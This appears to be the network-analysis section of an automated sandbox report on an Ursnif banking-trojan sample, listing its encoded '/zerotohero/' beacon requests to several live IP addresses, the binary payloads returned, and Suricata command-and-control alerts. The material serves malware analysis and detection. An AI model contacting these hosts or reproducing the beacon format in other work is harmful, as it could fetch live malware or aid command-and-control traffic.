Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
lisfwhite.ch2eck.yaheoo.com | | |
listwhfite.check3.yaho1o.com | | |
HTTP traffic
GET 200 http://185.212.47.65/zerotohero/cdXm_2FVJxK0LegSF/qWrY8fts8Fcq/0NYojf5UlKt/8DhxFr0B_2FsfH/yh95t8o1NlDiZvluicJ4e/y3s9rzRcxmXrVVJ7/Ka_2BqSUQBoccRO/pPeTmlMcibaZ1A8GB4/_2FCWWzpa/5CmD7rRKRlIWq5D4qu77/BGDeyVKNAc3pBFiPPX0/ncnmY9UmOi2ZepGuelaMz6/Fs7cUQ3jbJA0N/WaIYzdmN/W999YPszzQ3zvI2rKp8ilbI/G0MSN_2FTg/61lr6bk_2FfsZ31Jt/feVTEck3UWfb/5ZQcZoVE/Sy48y.asi
Request:
GET /zerotohero/cdXm_2FVJxK0LegSF/qWrY8fts8Fcq/0NYojf5UlKt/8DhxFr0B_2FsfH/yh95t8o1NlDiZvluicJ4e/y3s9rzRcxmXrVVJ7/Ka_2BqSUQBoccRO/pPeTmlMcibaZ1A8GB4/_2FCWWzpa/5CmD7rRKRlIWq5D4qu77/BGDeyVKNAc3pBFiPPX0/ncnmY9UmOi2ZepGuelaMz6/Fs7cUQ3jbJA0N/WaIYzdmN/W999YPszzQ3zvI2rKp8ilbI/G0MSN_2FTg/61lr6bk_2FfsZ31Jt/feVTEck3UWfb/5ZQcZoVE/Sy48y.asi HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Host: 185.212.47.65
Connection: Keep-Alive
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 02 Aug 2023 01:13:50 GMT
Content-Type: application/octet-stream
Content-Length: 182937
Connection: keep-alive
Pragma: public
Accept-Ranges: bytes
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Content-Disposition: inline; filename="64c9adce0da81.bin"
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
GET 200 http://45.155.249.172/zerotohero/_2BNfe26Q_2BhpzcY80eoW/2IbQqms219ain/8xo_2BRo/O79HFwawAOqR1xwy3PGyFgp/h2FreaMQGU/PghXl8ePxYt85SSHr/L_2B7SHWLYe8/Jvu0omXw0U8/B2o2reD4ai5rDs/W5ZivSf7_2FvcBaSlziH8/2oaBAztGA6DuRQnj/fby_2FNeLRkfUIG/Tb9pBn4LDJSKpggRop/2yOnyRMrq/hGr0R03Qs2AMMI3QMxF8/DcYedNwEbb0WMiSm2cz/GpYewdMSs8Cd7hz_2FvN34/4B_2By8bGbelM/gBrumlN3/yo9.asi
Request:
GET /zerotohero/_2BNfe26Q_2BhpzcY80eoW/2IbQqms219ain/8xo_2BRo/O79HFwawAOqR1xwy3PGyFgp/h2FreaMQGU/PghXl8ePxYt85SSHr/L_2B7SHWLYe8/Jvu0omXw0U8/B2o2reD4ai5rDs/W5ZivSf7_2FvcBaSlziH8/2oaBAztGA6DuRQnj/fby_2FNeLRkfUIG/Tb9pBn4LDJSKpggRop/2yOnyRMrq/hGr0R03Qs2AMMI3QMxF8/DcYedNwEbb0WMiSm2cz/GpYewdMSs8Cd7hz_2FvN34/4B_2By8bGbelM/gBrumlN3/yo9.asi HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Host: 45.155.249.172
Connection: Keep-Alive
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 02 Aug 2023 01:13:55 GMT
Content-Type: application/octet-stream
Content-Length: 182937
Connection: keep-alive
Pragma: public
Accept-Ranges: bytes
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Content-Disposition: inline; filename="64c9add3d0cd0.bin"
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
GET 200 http://78.138.9.136/zerotohero/BOMG5brBej/W6MNwYSFq4lSlX9tT/x4Y3Omef7UGN/WZhhSM2s5vi/V1FDzyIOh5EpoI/CWWIkqKkrw75RSUzXr7ex/W1RxkTyF3m2S3f2E/Y99btwsIJQuuhmN/lw3cuoTnNFNiXX7cu0/2whafmQx2/EkaF2FKoKeqHPMNHsEAQ/keKvvr9l1uzq8oU96Le/2jrUUusg_2B0I6xcr09dJj/XFvFn_2Fm4A8m/UqxdWdhP/VRi2h91sbdwC8lBB_2FDjJW/U_2ButnyPo/M3ehIUmus7lD5zNNn/gajTaRAeV8b6/0zF8WivYdTr/uC4wDLoi/v.asi
Request:
GET /zerotohero/BOMG5brBej/W6MNwYSFq4lSlX9tT/x4Y3Omef7UGN/WZhhSM2s5vi/V1FDzyIOh5EpoI/CWWIkqKkrw75RSUzXr7ex/W1RxkTyF3m2S3f2E/Y99btwsIJQuuhmN/lw3cuoTnNFNiXX7cu0/2whafmQx2/EkaF2FKoKeqHPMNHsEAQ/keKvvr9l1uzq8oU96Le/2jrUUusg_2B0I6xcr09dJj/XFvFn_2Fm4A8m/UqxdWdhP/VRi2h91sbdwC8lBB_2FDjJW/U_2ButnyPo/M3ehIUmus7lD5zNNn/gajTaRAeV8b6/0zF8WivYdTr/uC4wDLoi/v.asi HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Host: 78.138.9.136
Connection: Keep-Alive
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 02 Aug 2023 01:14:01 GMT
Content-Type: application/octet-stream
Content-Length: 182937
Connection: keep-alive
Pragma: public
Accept-Ranges: bytes
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Content-Disposition: inline; filename="64c9add9ad7d9.bin"
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
GET 200 http://79.132.130.230/zerotohero/DVrxwIAQMgsf7onOLh/XV75B5oFA/y1vXWahjjQZVMDH_2FiQ/4PZa4sHCsckUL377wx1/ZWvRgGdffXeg9iPEYWZ0h_/2BhA96Rc7xe4R/qby1FhUA/D3J5ocbPv6vcjAoxDEpqdg_/2BxvziDIQC/aLCB4AL9AMx8ac_2B/QNhLbiQcgZin/EpRbwzEa4e4/D_2BKwsvigFCN_/2FBg_2Fw3ZaNSpM8fK07N/yXdvG0NodEjK6LFi/2ZnEMcjmx0YgxZI/dLH_2BvcUmTIQFitsY/hIm1muN9Q/YX6gqoj0w/GcFQn4vTy/4.asi
Request:
GET /zerotohero/DVrxwIAQMgsf7onOLh/XV75B5oFA/y1vXWahjjQZVMDH_2FiQ/4PZa4sHCsckUL377wx1/ZWvRgGdffXeg9iPEYWZ0h_/2BhA96Rc7xe4R/qby1FhUA/D3J5ocbPv6vcjAoxDEpqdg_/2BxvziDIQC/aLCB4AL9AMx8ac_2B/QNhLbiQcgZin/EpRbwzEa4e4/D_2BKwsvigFCN_/2FBg_2Fw3ZaNSpM8fK07N/yXdvG0NodEjK6LFi/2ZnEMcjmx0YgxZI/dLH_2BvcUmTIQFitsY/hIm1muN9Q/YX6gqoj0w/GcFQn4vTy/4.asi HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Host: 79.132.130.230
Connection: Keep-Alive
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 02 Aug 2023 01:14:07 GMT
Content-Type: application/octet-stream
Content-Length: 182937
Connection: keep-alive
Pragma: public
Accept-Ranges: bytes
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Content-Disposition: inline; filename="64c9addf6b499.bin"
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
GET 200 http://79.132.130.230/zerotohero/K3vk9WJHpEMX6hbZw9tQyo5/AMBJbLu6tj/I4dyyPRvEIc_2Bo5I/2NUNLIkQqXoM/4CLXycYanau/8WFUZdkBqHxj0k/G1Dz8Bb1qnisHoMvqFItJ/4wfCjdP1Gf4MD015/_2Fjg_2BwAknLxt/5g2XdSihMUmd7kf0Vf/ZYb5g5bV4/ib0vVzu4C_2FW6ak5OEU/GWK9iVTriGnuRYnmHaa/jVg20muCMLk3bbDqYb9K4b/WNo_2BGUwzd9k/NzS1SsLQ/d6CTTcaEu36FGNawX2R0Kqo/C38zpv3wa/W12SJCNS.asi
Request:
GET /zerotohero/K3vk9WJHpEMX6hbZw9tQyo5/AMBJbLu6tj/I4dyyPRvEIc_2Bo5I/2NUNLIkQqXoM/4CLXycYanau/8WFUZdkBqHxj0k/G1Dz8Bb1qnisHoMvqFItJ/4wfCjdP1Gf4MD015/_2Fjg_2BwAknLxt/5g2XdSihMUmd7kf0Vf/ZYb5g5bV4/ib0vVzu4C_2FW6ak5OEU/GWK9iVTriGnuRYnmHaa/jVg20muCMLk3bbDqYb9K4b/WNo_2BGUwzd9k/NzS1SsLQ/d6CTTcaEu36FGNawX2R0Kqo/C38zpv3wa/W12SJCNS.asi HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Host: 79.132.130.230
Connection: Keep-Alive
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 02 Aug 2023 01:15:18 GMT
Content-Type: application/octet-stream
Content-Length: 182937
Connection: keep-alive
Pragma: public
Accept-Ranges: bytes
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Content-Disposition: inline; filename="64c9ae263464d.bin"
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.103:49165 -> 78.138.9.136:80 | 2033203 | ET MALWARE Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | Malware Command and Control Activity Detected |
TCP 192.168.56.103:49162 -> 185.212.47.65:80 | 2033204 | ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | Malware Command and Control Activity Detected |
TCP 192.168.56.103:49167 -> 79.132.130.230:80 | 2033203 | ET MALWARE Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | Malware Command and Control Activity Detected |
TCP 192.168.56.103:49166 -> 79.132.130.230:80 | 2033203 | ET MALWARE Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | Malware Command and Control Activity Detected |
TCP 192.168.56.103:49164 -> 45.155.249.172:80 | 2033203 | ET MALWARE Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | Malware Command and Control Activity Detected |
TCP 192.168.56.103:49164 -> 45.155.249.172:80 | 2033204 | ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | Malware Command and Control Activity Detected |
Suricata TLS
No Suricata TLS alerts.
Snort Alerts
No Snort alerts.